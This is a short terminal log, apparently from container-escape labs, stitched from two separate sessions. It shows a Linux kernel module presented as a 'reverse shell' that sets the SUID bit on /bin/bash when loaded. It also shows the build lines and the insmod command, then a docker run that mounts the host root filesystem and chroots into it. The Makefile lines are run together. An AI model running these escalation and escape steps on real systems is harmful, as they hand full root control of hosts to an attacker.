root@a2d8c468a7c2:/tmp# ./cdk eva --full
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","chmod u+s /bin/bash", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
obj-m +=reverse-shell.oall: make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modulesclean: make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean
root@a2d8c468a7c2:/tmp# insmod reverse-shell.ko
spanishdancer@ariekei:/opt/docker$ docker images
spanishdancer@ariekei:/opt/docker$ docker run -it -v /:/host/ waf-template chroot /host/ bash
